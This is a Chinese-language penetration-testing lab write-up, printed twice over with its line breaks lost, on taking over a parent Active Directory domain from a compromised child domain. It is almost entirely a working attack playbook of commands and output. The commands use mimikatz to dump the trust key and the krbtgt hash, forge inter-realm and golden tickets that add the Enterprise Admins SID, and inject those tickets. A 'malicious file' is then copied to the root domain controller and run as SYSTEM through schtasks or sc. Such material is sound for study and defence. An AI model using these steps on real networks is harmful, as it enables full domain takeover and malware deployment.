利用域信任密钥获取目标域实验环境IP地址所属域域中地位机器名当前登录用户192.168.113.152test.com根域的域控DChack\administrator192.168.113.153abc.test.com子域的域控DC2abc\administrator192.168.113.156abc.test.com子域中的机器Abc-losyabc\losy当前已经控制abc.hack.com域其中包括 DC2机器和ABC-LOSY机器实验步骤当前losy用户无法访问DC.test.COMshell dir \\dc.test.com\c$在控制的dc2下面使用mimikatz获取 当前域的 SID 父域的 SID 子域域管的NTLM 信任密钥mimikatz.exe privilege::debug lsadump::lsa /patch /user:TEST$ lsadump::trust /patch exitmimikatz privilege::debugmimikatz lsadump::lsa /patch /user:TEST$mimikatz lsadump::trust /patchCurrent domain: ABC.TEST.COM (ABC / S-1-5-21-138967882-756984254-3016740272)Domain: TEST.COM (TEST / S-1-5-21-2071415428-1615975719-3128489008)rc4_hmac_nt277a4340abf41c1a580dc99c730f20d8在普通的域内用户losy中创建创建高权限票据mimikatz.exe kerberos::golden /domain:子域 /sid:子域SID /sids:父域-519 /rc4:信任密钥 /user:任意用户 /service:krbtgt /target:父域 /ticket:subdc_administrator.kirbi exitàmimikatz kerberos::golden /domain:abc.test.com/sid:S-1-5-21-138967882-756984254-3016740272/sids:S-1-5-21-2071415428-1615975719-3128489008-519 /rc4:277a4340abf41c1a580dc99c730f20d8/user:administrator/service:krbtgt /target:test.com /ticket:administrator.kirbi上传asktgs.exe和kirbikator.exe工具asktgs.exe伪造票据kirbikator.exe注入票据创建CIFS服务的票据进行复制文件的操作shell asktgs.exe administrator.kirbi CIFS/DC.test.com将票据注入内存shell kirbikator.exe lsa CIFS.DC.test.com.kirbi访问域控shell dir \\dc.test.com\c$服务恶意文件,如果复制失败请注入host服务票据。shell copy 123.exe \\dc.test.com\c$伪造host服务进行创建计划任务shell asktgs.exe administrator.kirbi host/DC.test.com将票据注入内存shell kirbikator.exe lsa host.DC.test.com.kirbi上传恶意文件并创建计划任务shell copy 123.exe \\dc.test.com\C$\shell schtasks /create /s dc.test.com /tn test123 /sc onstart /tr c:\123.exe /ru system /f执行计划任务shell schtasks /run /s dc.test.com /i /tn test123用sc也可以shell copy 123.exe \\dc.test.com\C$\shell sc \\dc.test.com create test binpath cmd.exe /c c:\123.exeshell sc \\dc.test.com start testshell sc \\dc.test.com delete test提示如果做着做着就遇到拒绝访问的情况说明票据的时间戳失效了要shell klist purge后重新做利用krbtgt哈希值获取目标域实验环境IP地址所属域域中地位机器名当前登录用户192.168.113.152test.com根域的域控DChack\administrator192.168.113.153abc.test.com子域的域控DC2abc\administrator192.168.113.156abc.test.com子域中的机器Abc-losyabc\losy当前已经控制abc.hack.com域其中包括 DC2机器和ABC-LOSY机器实验步骤在dc2里面获取Krbtgt散列mimikatz lsadump::lsa /patch /user:krbtgtNTLM : f778d436c7b4ccecb735d596638c547a在dc2里面获取关键信息mimikatz lsadump::trust /patchCurrent domain: ABC.TEST.COM (ABC / S-1-5-21-138967882-756984254-3016740272)Domain: TEST.COM (TEST / S-1-5-21-2071415428-1615975719-3128489008)在losy用户下构造并注入黄金票据mimikatz Kerberos::golden /user:administrator /domain:当前域名/sid:当前SID /sids:目标域SID-519 /krbtgt:krbtgt散列/pttàmimikatz Kerberos::golden /user:administrator /domain:abc.test.com/sid:S-1-5-21-138967882-756984254-3016740272/sids:S-1-5-21-2071415428-1615975719-3128489008-519 /krbtgt:f778d436c7b4ccecb735d596638c547a/ptt访问目标域shell dir \\dc.test.com\c$上传恶意文件并创建计划任务shell copy 123.exe \\dc.test.com\C$\shell schtasks /create /s dc.test.com /tn test123 /sc onstart /tr c:\123.exe /ru system /f执行计划任务shell schtasks /run /s dc.test.com /i /tn test123
内网渗透-域控安全和跨域攻击-获取目标域方法总结
利用域信任密钥获取目标域实验环境IP地址所属域域中地位机器名当前登录用户192.168.113.152test.com根域的域控DChack\administrator192.168.113.153abc.test.com子域的域控DC2abc\administrator192.168.113.156abc.test.com子域中的机器Abc-losyabc\losy当前已经控制abc.hack.com域其中包括 DC2机器和ABC-LOSY机器实验步骤当前losy用户无法访问DC.test.COMshell dir \\dc.test.com\c$在控制的dc2下面使用mimikatz获取 当前域的 SID 父域的 SID 子域域管的NTLM 信任密钥mimikatz.exe privilege::debug lsadump::lsa /patch /user:TEST$ lsadump::trust /patch exitmimikatz privilege::debugmimikatz lsadump::lsa /patch /user:TEST$mimikatz lsadump::trust /patchCurrent domain: ABC.TEST.COM (ABC / S-1-5-21-138967882-756984254-3016740272)Domain: TEST.COM (TEST / S-1-5-21-2071415428-1615975719-3128489008)rc4_hmac_nt277a4340abf41c1a580dc99c730f20d8在普通的域内用户losy中创建创建高权限票据mimikatz.exe kerberos::golden /domain:子域 /sid:子域SID /sids:父域-519 /rc4:信任密钥 /user:任意用户 /service:krbtgt /target:父域 /ticket:subdc_administrator.kirbi exitàmimikatz kerberos::golden /domain:abc.test.com/sid:S-1-5-21-138967882-756984254-3016740272/sids:S-1-5-21-2071415428-1615975719-3128489008-519 /rc4:277a4340abf41c1a580dc99c730f20d8/user:administrator/service:krbtgt /target:test.com /ticket:administrator.kirbi上传asktgs.exe和kirbikator.exe工具asktgs.exe伪造票据kirbikator.exe注入票据创建CIFS服务的票据进行复制文件的操作shell asktgs.exe administrator.kirbi CIFS/DC.test.com将票据注入内存shell kirbikator.exe lsa CIFS.DC.test.com.kirbi访问域控shell dir \\dc.test.com\c$服务恶意文件,如果复制失败请注入host服务票据。shell copy 123.exe \\dc.test.com\c$伪造host服务进行创建计划任务shell asktgs.exe administrator.kirbi host/DC.test.com将票据注入内存shell kirbikator.exe lsa host.DC.test.com.kirbi上传恶意文件并创建计划任务shell copy 123.exe \\dc.test.com\C$\shell schtasks /create /s dc.test.com /tn test123 /sc onstart /tr c:\123.exe /ru system /f执行计划任务shell schtasks /run /s dc.test.com /i /tn test123用sc也可以shell copy 123.exe \\dc.test.com\C$\shell sc \\dc.test.com create test binpath cmd.exe /c c:\123.exeshell sc \\dc.test.com start testshell sc \\dc.test.com delete test提示如果做着做着就遇到拒绝访问的情况说明票据的时间戳失效了要shell klist purge后重新做利用krbtgt哈希值获取目标域实验环境IP地址所属域域中地位机器名当前登录用户192.168.113.152test.com根域的域控DChack\administrator192.168.113.153abc.test.com子域的域控DC2abc\administrator192.168.113.156abc.test.com子域中的机器Abc-losyabc\losy当前已经控制abc.hack.com域其中包括 DC2机器和ABC-LOSY机器实验步骤在dc2里面获取Krbtgt散列mimikatz lsadump::lsa /patch /user:krbtgtNTLM : f778d436c7b4ccecb735d596638c547a在dc2里面获取关键信息mimikatz lsadump::trust /patchCurrent domain: ABC.TEST.COM (ABC / S-1-5-21-138967882-756984254-3016740272)Domain: TEST.COM (TEST / S-1-5-21-2071415428-1615975719-3128489008)在losy用户下构造并注入黄金票据mimikatz Kerberos::golden /user:administrator /domain:当前域名/sid:当前SID /sids:目标域SID-519 /krbtgt:krbtgt散列/pttàmimikatz Kerberos::golden /user:administrator /domain:abc.test.com/sid:S-1-5-21-138967882-756984254-3016740272/sids:S-1-5-21-2071415428-1615975719-3128489008-519 /krbtgt:f778d436c7b4ccecb735d596638c547a/ptt访问目标域shell dir \\dc.test.com\c$上传恶意文件并创建计划任务shell copy 123.exe \\dc.test.com\C$\shell schtasks /create /s dc.test.com /tn test123 /sc onstart /tr c:\123.exe /ru system /f执行计划任务shell schtasks /run /s dc.test.com /i /tn test123
